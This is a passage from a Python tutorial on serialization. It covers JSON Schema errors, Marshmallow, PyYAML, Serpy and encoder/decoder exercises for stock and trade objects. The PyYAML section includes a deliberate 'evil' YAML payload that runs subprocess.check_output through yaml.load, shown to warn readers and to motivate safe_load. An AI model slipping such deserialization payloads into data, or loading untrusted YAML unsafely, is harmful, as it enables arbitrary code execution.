None is not of type 'string'

Failed validating 'type' in schema['properties']['middleInitial']:
    {'maxLength': 1, 'minLength': 1, 'type': 'string'}

On instance['middleInitial']:
    None
-----------
'blue-gray' is not one of ['amber', 'blue', 'brown', 'gray', 'green', 'hazel', 'red', 'violet']

Failed validating 'enum' in schema['properties']['eyeColor']:
    {'enum': ['amber',
              'blue',
              'brown',
              'gray',
              'green',
              'hazel',
              'red',
              'violet'],
     'type': 'string'}

On instance['eyeColor']:
    'blue-gray'
-----------


So JSON Schema paired with this library is a great way to ensure a JSON document conforms to some specific schema. It is useful even when you create your own JSON serializer to make sure you are conforming to your own pre-determined schema - especially useful in unit testing to make sure you did not miss something when serializing your objects to JSON.

But all this does not address the other issue we have - serializing and deserializing Python objects to and from JSON strings (marshalling).

Not to worry, there are also quite a few libraries out there that will help with this difficult task too.

In the next video I will look at one of the more popular ones - Mashmallow - but there are others as well.

##  Marshmallow

Marshmallow gets its name from "marshalling" - in other words it is a library that can be used to "translate" objects to and from complex data types (such as custom objects) and simple datatypes (such as dictionaries or lists of strings, integers, etc), sometimes called  native data types, which can then easily be serialized and deserialized into a JSON format.
At the same time, it can also perform validation.

Marshmallow is very customizable, and I am not going to go into a whole lot of detail here, other than show you a few examples.

If you want more info about this great Python library, you can read up about it here: https://marshmallow.readthedocs.io/en/3.0/


As might be expected, we still declare some sort of schema for our data - there's no magic here!

Let's first see how we might create a simple schema for our `Person` object.

We start by creating the class itself that we will use in our app:

In [1]:
class Person:
    def __init__(self, first_name, last_name, dob):
        self.first_name = first_name
        self.last_name = last_name
        self.dob = dob
        
    def __repr__(self):
        return f'Person({self.first_name}, {self.last_name}, {self.dob})'

In [2]:
from datetime import date

p1 = Person('John', 'Cleese', date(1939, 10, 27))

In [3]:
p1

Person(John, Cleese, 1939-10-27)

So we want to serialize and deserialize this `Person` object into a simple dictionary containing strings, including an ISO formatted string for the date of birth.

In [4]:
from marshmallow import Schema, fields

In [5]:
class PersonSchema(Schema):
    first_name = fields.Str()
    last_name = fields.Str()
    dob = fields.Date()

We can now create a schema instance that will handle any object type that has the `first_name`, `last_name` and `dob` fields. You'll notice that we used Marshmallow specific data types for strings and dates. Marshmallow has many other data types too to handle Booleans, numbers (integers, reals, even decimals), datetime, email, url, etc.

We first have to create an instance of the `PersonSchema` class:

In [6]:
person_schema = PersonSchema()

We can serialize our custom object into a "simple" dictionary:

In [7]:
person_schema.dump(p1)

MarshalResult(data={'first_name': 'John', 'dob': '1939-10-27', 'last_name': 'Cleese'}, errors={})

As you can see we have two properties here: `data` and `errors`. The `data` property will contain our serialized data, and the `errors` property will tell us if any errors were encountered while serializing our objects.

In [8]:
type(person_schema.dump(p1).data)

dict

We can also serialize our objects directly to JSON using `dumps`:

In [9]:
person_schema.dumps(p1).data

'{"first_name": "John", "dob": "1939-10-27", "last_name": "Cleese"}'

We can use other objects, not necessarily of `Person` type, and if those fields are present they will be used in the serialization:

In [10]:
from collections import namedtuple

PT=namedtuple('PT', 'first_name, last_name, dob')

In [11]:
p2 = PT('Eric', 'Idle', date(1943, 3, 29))

In [12]:
person_schema.dumps(p2).data

'{"first_name": "Eric", "dob": "1943-03-29", "last_name": "Idle"}'

But if we use an object that does not have the required fields:

In [13]:
PT2 = namedtuple('PT2', 'first_name, last_name, age')
p3 = PT2('Michael', 'Palin', 75)

In [14]:
person_schema.dumps(p3).data

'{"first_name": "Michael", "last_name": "Palin"}'

As you can see Marshmallow here only uses what it can.

What's interesting is that we can also specify what fields should occur in the deserialized output, using `only` to specify inclusions, or `exclude` to specify exclusions:

In [15]:
person_partial = PersonSchema(only=('first_name', 'last_name'))

In [16]:
person_partial.dumps(p1).data

'{"first_name": "John", "last_name": "Cleese"}'

Equivalently:

In [17]:
person_partial = PersonSchema(exclude=['dob'])

In [18]:
person_partial.dumps(p1).data

'{"first_name": "John", "last_name": "Cleese"}'

What happens if we have the wrong data type for those fields?

In [19]:
p4 = Person(100, None, 200)

In [20]:
person_schema.dumps(p4)

MarshalResult(data='{"first_name": "100", "last_name": null}', errors={'dob': ['"200" cannot be formatted as a date.']})

As you can see, the `errors` property tells us that the data value could not be interpreted as a date.

On the other hand the values `100` and `None` for the string values were fine - the integer was converted into a string, and the `None` value for `last_name` was retained.

Our schemas can also get more complicated, including sub-schemas based on other schemas.

For example, we can define a `Movie` schema that includes a movie title, year of release, and a list of actors:

In [21]:
class Movie:
    def __init__(self, title, year, actors):
        self.title = title
        self.year = year
        self.actors = actors

In [22]:
class MovieSchema(Schema):
    title = fields.Str()
    year = fields.Integer()
    actors = fields.Nested(PersonSchema, many=True)

In [23]:
p1, p2

(Person(John, Cleese, 1939-10-27),
 PT(first_name='Eric', last_name='Idle', dob=datetime.date(1943, 3, 29)))

In [24]:
parrot = Movie('Parrot Sketch', 1989, [p1, 
                                       Person('Michael', 
                                              'Palin', 
                                              date(1943, 5, 5))
                                      ])

In [25]:
MovieSchema().dumps(parrot)

MarshalResult(data='{"title": "Parrot Sketch", "year": 1989, "actors": [{"first_name": "John", "dob": "1939-10-27", "last_name": "Cleese"}, {"first_name": "Michael", "dob": "1943-05-05", "last_name": "Palin"}]}', errors={})

There's a lot more we can do to control serialization - take a look at the documentation if you want to learn more.

Now, let's look at deserialization a little bit.

To deserialize a simple dictionary we use the `load` method (deserializes a dictionary, the opposite of what `dump` does basically). We deserialize a JSON string using the `loads` method.

Let's recall our Person schema:

In [26]:
class PersonSchema(Schema):
    first_name = fields.Str()
    last_name = fields.Str()
    dob = fields.Date()

And let's deserialize a dictionary:

In [27]:
person_schema = PersonSchema()

In [28]:
person_schema.load(dict(first_name='John',
                        last_name='Cleese',
                        dob='1939-10-27'))

UnmarshalResult(data={'first_name': 'John', 'dob': datetime.date(1939, 10, 27), 'last_name': 'Cleese'}, errors={})

So you can see we get this `UnmarshalResult` object back, with a `data` property - notice how the data was converted from a string into an actual date object.

But we still did not get a `Person` object back in `data`. Instead we got a plain dictionary back - ultimately we may want a `Person` object.

To do this, we need to tell Marshmallow what object to use when it deserializes our data:

In [29]:
from marshmallow import post_load

class PersonSchema(Schema):
    first_name = fields.Str()
    last_name = fields.Str()
    dob = fields.Date()
    
    @post_load
    def make_person(self, data):
        return Person(**data)

In [30]:
person_schema = PersonSchema()

In [31]:
person_schema.load(dict(first_name='John',
                        last_name='Cleese',
                        dob='1939-10-27'))

UnmarshalResult(data=Person(John, Cleese, 1939-10-27), errors={})

And now you can see that `data` contains a `Person` object.

So now let's go ahead and fix up our `MovieSchema` as well:

In [32]:
class MovieSchema(Schema):
    title = fields.Str()
    year = fields.Integer()
    actors = fields.Nested(PersonSchema, many=True)
    
    @post_load
    def make_movie(self, data):
        return Movie(**data)

In [33]:
movie_schema = MovieSchema()

Here we're going to load from a JSON string to see that it works equally well:

In [34]:
json_data = '''
{"actors": [
    {"first_name": "John", "last_name": "Cleese", "dob": "1939-10-27"}, 
    {"first_name": "Michael", "last_name": "Palin", "dob": "1943-05-05"}], 
"title": "Parrot Sketch", 
"year": 1989}
'''

In [35]:
movie = movie_schema.loads(json_data).data

In [36]:
type(movie)

__main__.Movie

In [37]:
movie.title, movie.year

('Parrot Sketch', 1989)

In [38]:
movie.actors

[Person(John, Cleese, 1939-10-27), Person(Michael, Palin, 1943-05-05)]

There is a **lot** more that this library can do - we did not even touch on validation here (required fields for example), nor how you can manipulate serialization and deserialization in many different ways, including handling of missing values, and much much more. If you are going to work with complex objects and have to deal with JSON (or other) marshalling, I strongly urge you to consider this library. It has a bit of a learning curve, but is well worth the effort!

There are others out there as well. `Colander`, part of the `Pyramid` project is also popular with people using `Pyramid`. Personally I just find `Marshmallow` more powerful and pleasant to work with.

##  YAML Format

YAML, like JSON, is another data serialization standard. It is actually easier to read than JSON, and although it has been around for a long time (since 2001), it has gained a lot of popularity, especially in the Dev Ops world for configuration files (Docker, Kubernetes, etc).

Like JSON it is able to represent simple data types (strings, numbers, boolean, etc) as well as collections and associative arrays (dictionaries).

YAML focuses on human readability, and is a little more complex to parse.

Here is a sample YAML file:

```
title: Parrot Sketch
year: 1989
actors:
    - first_name: John
      last_name: Cleese
      dob: 1939-10-27
    - first_name: Michael
      last_name: Palin
      dob: 1943-05-05
```

As you can see this is much easier to read than JSON or XML.

To parse YAML into a Python dictionary would take a fair amount of work - especially since YAML is quite flexible.

Fortunately, we can use the 3rd party library, `pyyaml` to do this for us.

Again, I'm only going to show you a tiny bit of this library, and you can read more about it here:
https://pyyaml.org/wiki/PyYAMLDocumentation

(It's definitely less of a learning curve than Marshmallow!!)

#### Caution
When you load a yaml file using pyyaml, be careful - like pickling it can actually call out to Python functions - so do not load untrusted YAML files using `pyyaml`!

In [1]:
import yaml

In [2]:
data = '''
---
title: Parrot Sketch
year: 1989
actors:
    - first_name: John
      last_name: Cleese
      dob: 1939-10-27
    - first_name: Michael
      last_name: Palin
      dob: 1943-05-05
'''

In [3]:
d = yaml.load(data)

In [4]:
type(d)

dict

In [5]:
from pprint import pprint

pprint(d)

{'actors': [{'dob': datetime.date(1939, 10, 27),
             'first_name': 'John',
             'last_name': 'Cleese'},
            {'dob': datetime.date(1943, 5, 5),
             'first_name': 'Michael',
             'last_name': 'Palin'}],
 'title': 'Parrot Sketch',
 'year': 1989}


You'll notice that unlike the built-in JSON parser, PyYAML was able to automatically deduce the `date` type in our YAML, as well of course as strings and integers.

Of course, serialization works the same way:

In [6]:
d = {'a': 100, 'b': False, 'c': 10.5, 'd': [1, 2, 3]}

In [7]:
print(yaml.dump(d))

a: 100
b: false
c: 10.5
d: [1, 2, 3]



You'll notice in the above example that the list was represented using `[1, 2, 3]` - this is valid YAML as well, and is equivalent to this notation:

```
d:
    - 1
    - 2
    - 3
```

If you prefer this block style, you can force it this way:

In [8]:
print(yaml.dump(d, default_flow_style=False))

a: 100
b: false
c: 10.5
d:
- 1
- 2
- 3



What's interesting about PyYAML is that it can also automatically serialize and deserialize complex objects:

In [9]:
class Person:
    def __init__(self, name, dob):
        self.name = name
        self.dob = dob
        
    def __repr__(self):
        return f'Person(name={self.name}, dob={self.dob})'

In [10]:
from datetime import date

p1 = Person('John Cleese', date(1939, 10, 27))
p2 = Person('Michael Palin', date(1934, 5, 5))

In [11]:
print(yaml.dump({'john': p1, 'michael': p2}))

john: !!python/object:__main__.Person {dob: 1939-10-27, name: John Cleese}
michael: !!python/object:__main__.Person {dob: 1934-05-05, name: Michael Palin}



Notice that weird looking syntax? It's actually useful when we deserialize the YAML string - of course it means we must have a `Person` class defined with the appropriate init method.

In [12]:
yaml_data = '''
john: !!python/object:__main__.Person 
    dob: 1939-10-27
    name: John Cleese
michael: !!python/object:__main__.Person 
    dob: 1934-05-05
    name: Michael Palin
'''

In [13]:
d = yaml.load(yaml_data)

In [14]:
d

{'john': Person(name=John Cleese, dob=1939-10-27),
 'michael': Person(name=Michael Palin, dob=1934-05-05)}

As you can see, `john` and `michael` were deserialized into `Person` type objects.

This is why you have to be quite careful with the source of any YAML you deserialize.

Here's an evil example:

In [15]:
yaml_data = '''
exec_paths: 
    !!python/object/apply:os.get_exec_path []
exec_command:
    !!python/object/apply:subprocess.check_output [['ls', '/']]
'''

In [16]:
yaml.load(yaml_data)

{'exec_paths': ['/Users/fbaptiste/anaconda3/envs/deepdive/bin',
  '/Users/fbaptiste/anaconda3/envs/deepdive/bin',
  '/Users/fbaptiste/anaconda3/bin',
  '/usr/local/bin',
  '/usr/bin',
  '/bin',
  '/usr/sbin',
  '/sbin'],
 'exec_command': b'Applications\nLibrary\nNetwork\nSystem\nUsers\nVolumes\nbin\ncores\ndev\netc\nhome\ninstaller.failurerequests\nnet\nprivate\nsbin\ntmp\nusr\nvar\n'}

So, be very careful with `load`. In general it is safer practice to use the `safe_load` method instead, but you will lose the ability to deserialize into custom Python objects, unless you override that behavior. You can always use Marshmallow to do that secondary step in a safer way.

In [17]:
yaml.safe_load(yaml_data)

ConstructorError: could not determine a constructor for the tag 'tag:yaml.org,2002:python/object/apply:os.get_exec_path'
  in "<unicode string>", line 3, column 5:
        !!python/object/apply:os.get_exe ... 
        ^

To override and allow certain Python objects to be deserialized in `safe_load` we can proceed this way.

Firstly we are going to simplify the object tag notation by customizing it in our `Person` class, and we are also going to make our object as safe to be deserialized. Our `Person` class will now have to inherit from the `yaml.YAMLObject`:

In [18]:
from yaml import YAMLObject, SafeLoader

class Person(YAMLObject):
    yaml_tag = '!Person'
    
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

First let's see how objects are now serialized:

In [19]:
yaml.dump(dict(john=Person('John Cleese', 79),
               michael=Person('Michael Palin', 74)))

'john: !Person {age: 79, name: John Cleese}\nmichael: !Person {age: 74, name: Michael Palin}\n'

As you can see we have a slightly cleaner syntax.

Now let's try to load the serialized version:

In [20]:
yaml_data = '''
john: !Person
    name: John Cleese
    age: 79
michael: !Person
    name: Michael Palin
    age: 74
'''

In [21]:
yaml.load(yaml_data)

{'john': Person(name=John Cleese, age=79),
 'michael': Person(name=Michael Palin, age=74)}

And `safe_load`:

In [22]:
yaml.safe_load(yaml_data)

ConstructorError: could not determine a constructor for the tag '!Person'
  in "<unicode string>", line 2, column 7:
    john: !Person
          ^

So now let's mark our `Person` object as safe:

In [23]:
class Person(YAMLObject):
    yaml_tag = '!Person'
    yaml_loader = SafeLoader
    
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [24]:
yaml.safe_load(yaml_data)

{'john': Person(name=John Cleese, age=79),
 'michael': Person(name=Michael Palin, age=74)}

And as you can see, the deserializtion now works for the `Person` class.

There's a lot more this library can do, so look at the reference if you want to use YAML. 

Also, as I mentionmed before, you can combine this with `Marshmallow` for example to get to a full marshalling solution to complex (custom) Python types.

##  Serpy

If you're just looking for deserialization, then `Serpy` might work for you. It is extremely fast, but only provides serialization.

You can read more about Serpy here: https://serpy.readthedocs.io/en/latest/

Here's a simple example first, using our goto Person object.

In [1]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [2]:
import serpy

Very similarly to `Marshmallow` we need to define a schema for the serialization - Serpy calls those objects serializers:

In [3]:
class PersonSerializer(serpy.Serializer):
    name = serpy.StrField()
    age = serpy.IntField()

In [4]:
p1 = Person('Michael Palin', 75)

In [5]:
PersonSerializer(p1).data

{'name': 'Michael Palin', 'age': 75}

Of course, we can get more complex schemas defined.

Let's implement a schema for our `Movie` example we did in a previous video on Marshmallow.

In [6]:
class Movie:
    def __init__(self, title, year, actors):
        self.title = title
        self.year = year
        self.actors = actors

In [7]:
class MovieSerializer(serpy.Serializer):
    title = serpy.StrField()
    year = serpy.IntField()
    actors = PersonSerializer(many=True)

In [8]:
p2 = Person('John Cleese', 79)

In [9]:
movie = Movie('Parrot Sketch', 1989, [p1, p2])

In [10]:
movie.title, movie.year, movie.actors

('Parrot Sketch',
 1989,
 [Person(name=Michael Palin, age=75), Person(name=John Cleese, age=79)])

In [11]:
MovieSerializer(movie).data

{'title': 'Parrot Sketch',
 'year': 1989,
 'actors': [{'name': 'Michael Palin', 'age': 75},
  {'name': 'John Cleese', 'age': 79}]}

Note that the result of serialization is to a basic Python dictionary, and you can takes this further to JSON or YAML using the standard library `json` module or `PyYaml`.

For example:

In [12]:
import json
import yaml

In [13]:
json.dumps(MovieSerializer(movie).data)

'{"title": "Parrot Sketch", "year": 1989, "actors": [{"name": "Michael Palin", "age": 75}, {"name": "John Cleese", "age": 79}]}'

In [14]:
print(yaml.dump(MovieSerializer(movie).data, 
          default_flow_style=False))

actors:
- age: 75
  name: Michael Palin
- age: 79
  name: John Cleese
title: Parrot Sketch
year: 1989



# Section 08 - Coding Exercises

##  Coding Exercises

Consider the following classes:

In [1]:
class Stock:
    def __init__(self, symbol, date, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume

#### Exercise 1

Given the above class, write a custom `JSONEncoder` class to **serialize** dictionaries that contain instances of these particular classes. Keep in mind that you will want to deserialize the data too - so you will need some technique to indicate the object type in your serialization.

For example you may have an object such as this one that needs to be serialized:

In [2]:
from datetime import date, datetime
from decimal import Decimal

activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

Hint: You can modify the classes if you need to.

#### Exercise 2

Write code to reverse the serialization you just created. Write a custom decoder that can deserialize a JSON structure containing `Stock` and `Trade` objects. 

#### Exercise 3

Do the same serialization and deserialization, but using `Marshmallow`.

##  Exercise 1 - Solution

The first thing I am going to do is add an `as_dict` method to both my classes to make serialization a bit easier:

In [1]:
class Stock:
    def __init__(self, symbol, date_, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date_
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
    def as_dict(self):
        return dict(symbol=self.symbol, 
                    date=self.date,
                    open=self.open,
                    high=self.high,
                    low=self.low,
                    close=self.close,
                    volume=self.volume)
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume
        
    def as_dict(self):
        return dict(
            symbol=self.symbol,
            timestamp=self.timestamp,
            order=self.order,
            price=self.price,
            volume=self.volume,
            commission=self.commission)

In [2]:
from datetime import date, datetime
from decimal import Decimal

activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

My approach is going to be to serialize these classes using a special class name identifier.

For example to serialize `Stock` objects I will use this format:

```
{
    "object": "Stock",
    "symbol": "...",
    ...
}
```

Similarly for a `Trade` objects.

Furthermore, I need to pay special attention to dates, timestamps and prices.

For dates and timestamps I will use the standard ISO format (`YYYY-MM-DD` and `YYYY-MM-DDTHH:MM:SS`).

Prices are stored in `Decimal` objects - so we'll have to handle serialization for those objects too.

In [3]:
from json import JSONEncoder, dumps

class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock):
            return obj.as_dict()
        elif isinstance(obj, Trade):
            return obj_as_dict()
        else:
            super().default(obj)

This will not work quite yet - we are not handling decimal, date and datetime serialization:

In [4]:
dumps(activity, cls=CustomEncoder)

TypeError: Object of type 'date' is not JSON serializable

There's a few ways we can fix that - we could serialize by coding the date formatting directly in the `Trade` or `Stock` serializers:

In [5]:
from json import JSONEncoder, dumps

class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock):
            result = obj.as_dict()
            result['date'] = result['date'].strftime('%Y-%m-%d')
            return result
        elif isinstance(obj, Trade):
            result = obj.as_dict()
            result['timestamp'] = result['timestamp'].strftime('%Y-%m-%dT%H:%M:%S')
            return result
        else:
            super().default(obj)

This will still not quite work because we are not handling serizliation of `Decimal` objects. But I would rather not have to handle them the way we are handling `date` and `datetime` objects - that would be very tedious.

In fact, I am going to write handlers for the `Decimal` as well as `date` and `datetime` classes this way:

In [6]:
from json import JSONEncoder, dumps

class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock) or isinstance(obj, Trade):
            return obj.as_dict()
        elif isinstance(obj, datetime):
            # check for datetime first, because a datetime is also a date
            return obj.strftime('%Y-%m-%dT%H:%M:%S')
        elif isinstance(obj, date):
            return obj.strftime('%Y-%m-%d')
        elif isinstance(obj, Decimal):
            return str(obj)
        else:
            super().default(obj)

In [7]:
encoded = dumps(activity, cls=CustomEncoder, indent=2)

In [8]:
print(encoded)

{
  "quotes": [
    {
      "symbol": "TSLA",
      "date": "2018-11-22",
      "open": "338.19",
      "high": "338.64",
      "low": "337.60",
      "close": "338.19",
      "volume": 365607
    },
    {
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184
    },
    {
      "symbol": "MSFT",
      "date": "2018-11-22",
      "open": "103.25",
      "high": "103.48",
      "low": "103.07",
      "close": "103.11",
      "volume": 4493689
    }
  ],
  "trades": [
    {
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99"
    },
    {
      "symbol": "AAPL",
      "timestamp": "2018-11-22T10:30:05",
      "order": "sell",
      "price": "177.01",
      "volume": 20,
      "commission": "9.99"
    }
  ]
}


We're almost there - the serialization works just fine, but if I'm going to deserialize the objects later, I will need to know what the object type is for the `Trade` and `Stock` objects. We could add it to the `as_dict` methods of each class, but I don't necessarily want it all the time - so instead I am going to inject the class name during the serialization:

In [9]:
class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock) or isinstance(obj, Trade):
            result =  obj.as_dict()
            result['object'] = obj.__class__.__name__
            return result
        elif isinstance(obj, datetime):
            return obj.strftime('%Y-%m-%dT%H:%M:%S')
        elif isinstance(obj, date):
            return obj.strftime('%Y-%m-%d')
        elif isinstance(obj, Decimal):
            return str(obj)
        else:
            super().default(obj)

In [10]:
result = dumps(activity, cls=CustomEncoder, indent=2)
print(result)

{
  "quotes": [
    {
      "symbol": "TSLA",
      "date": "2018-11-22",
      "open": "338.19",
      "high": "338.64",
      "low": "337.60",
      "close": "338.19",
      "volume": 365607,
      "object": "Stock"
    },
    {
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    },
    {
      "symbol": "MSFT",
      "date": "2018-11-22",
      "open": "103.25",
      "high": "103.48",
      "low": "103.07",
      "close": "103.11",
      "volume": 4493689,
      "object": "Stock"
    }
  ],
  "trades": [
    {
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    },
    {
      "symbol": "AAPL",
      "timestamp": "2018-11-22T10:30:05",
      "order": "sell",
      "price": "177.01",
      "volume": 20

##  Exercise 2 - Solution

Here's where we ended up after completing Exercise 1:

In [1]:
from json import JSONEncoder, dumps
from datetime import date, datetime
from decimal import Decimal

class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock) or isinstance(obj, Trade):
            result =  obj.as_dict()
            result['object'] = obj.__class__.__name__
            return result
        elif isinstance(obj, datetime):
            return obj.strftime('%Y-%m-%dT%H:%M:%S')
        elif isinstance(obj, date):
            return obj.strftime('%Y-%m-%d')
        elif isinstance(obj, Decimal):
            return str(obj)
        else:
            super().default(obj)

In [2]:
class Stock:
    def __init__(self, symbol, date_, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date_
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
    def as_dict(self):
        return dict(symbol=self.symbol, 
                    date=self.date,
                    open=self.open,
                    high=self.high,
                    low=self.low,
                    close=self.close,
                    volume=self.volume)
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume
        
    def as_dict(self):
        return dict(
            symbol=self.symbol,
            timestamp=self.timestamp,
            order=self.order,
            price=self.price,
            volume=self.volume,
            commission=self.commission)

In [3]:
activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

And we could serialize our objects:

In [4]:
encoded = dumps(activity, cls=CustomEncoder, indent=2)
print(encoded)

{
  "quotes": [
    {
      "symbol": "TSLA",
      "date": "2018-11-22",
      "open": "338.19",
      "high": "338.64",
      "low": "337.60",
      "close": "338.19",
      "volume": 365607,
      "object": "Stock"
    },
    {
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    },
    {
      "symbol": "MSFT",
      "date": "2018-11-22",
      "open": "103.25",
      "high": "103.48",
      "low": "103.07",
      "close": "103.11",
      "volume": 4493689,
      "object": "Stock"
    }
  ],
  "trades": [
    {
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    },
    {
      "symbol": "AAPL",
      "timestamp": "2018-11-22T10:30:05",
      "order": "sell",
      "price": "177.01",
      "volume": 20

Now we want to reverse the process and deserialize this JSON object. I am not going to assume any specific schema other than `Stock` and `Trade` objects will contain the `"class": "Stock"` or `"object": "Trade"` entries and the required additional fields to define those objects.

What I want to do is examine each dictionary, and if it contains those entries, I will want to deserialize as the corresponding objects.

We'll need to pay attention also to `date`, `datetime`, and `Decimal` type objects.

Let's start by writing a utility function that will convert a JSON dictionary of each specific type to the corresponding object type:

In [5]:
def decode_stock(d):
    # assumes "class": "Stock" is in the dictionary
    # and contains all the required serialized fields needed to re-create the object
    # if working in Python 3.7, we could use date.fromisoformat(d['date']) instead
    s = Stock(d['symbol'], 
              datetime.strptime(d['date'], '%Y-%m-%d').date(), 
              Decimal(d['open']), 
              Decimal(d['high']), 
              Decimal(d['low']), 
              Decimal(d['close']),
              int(d['volume']))
    return s

Let's make sure this works:

In [6]:
s = decode_stock({
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    })

In [7]:
type(s), vars(s)

(__main__.Stock,
 {'symbol': 'AAPL',
  'date': datetime.date(2018, 11, 22),
  'open': Decimal('176.66'),
  'high': Decimal('177.25'),
  'low': Decimal('176.64'),
  'close': Decimal('176.78'),
  'volume': 3699184})

Now let's do the same thing with a `Trade`:

In [8]:
def decode_trade(d):
    # assumes "class": "Trade" is in the dictionary
    # and contains all the required serialized fields needed to re-create the object
    s = Trade(d['symbol'], 
              datetime.strptime(d['timestamp'], '%Y-%m-%dT%H:%M:%S'), 
              d['order'], 
              Decimal(d['price']), 
              int(d['volume']), 
              Decimal(d['commission']))
    return s

In [9]:
t = decode_trade({
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    })

In [10]:
type(t), vars(t)

(__main__.Trade,
 {'symbol': 'TSLA',
  'timestamp': datetime.datetime(2018, 11, 22, 10, 5, 12),
  'order': 'buy',
  'price': Decimal('338.25'),
  'commission': Decimal('9.99'),
  'volume': 100})

OK, these look good to go, so one last utility function that can take in **either** a `Stock` or `Trade` type JSON object, and decode accordingly:

In [11]:
def decode_financials(d):
    object_type = d.get('object', None)
    if object_type == 'Stock':
        return decode_stock(d)
    elif object_type == 'Trade':
        return decode_trade(d)
    return d  

In [12]:
decode_financials({
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    })

<__main__.Trade at 0x10c4dc1d0>

In [13]:
decode_financials({
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    })

<__main__.Stock at 0x10c4dc588>

So now let's write our custom JSON decoding class:

In [14]:
from json import JSONDecoder, loads

In [15]:
class CustomDecoder(JSONDecoder):
    def decode(self, arg):
        data = loads(arg)
        # now we have to recursively look for `Trade` and `Stock` objects
        return self.parse_financials(data)
 
    def parse_financials(self, obj):
        if isinstance(obj, dict):
            obj = decode_financials(obj)
            if isinstance(obj, dict):
                for key, value in obj.items():
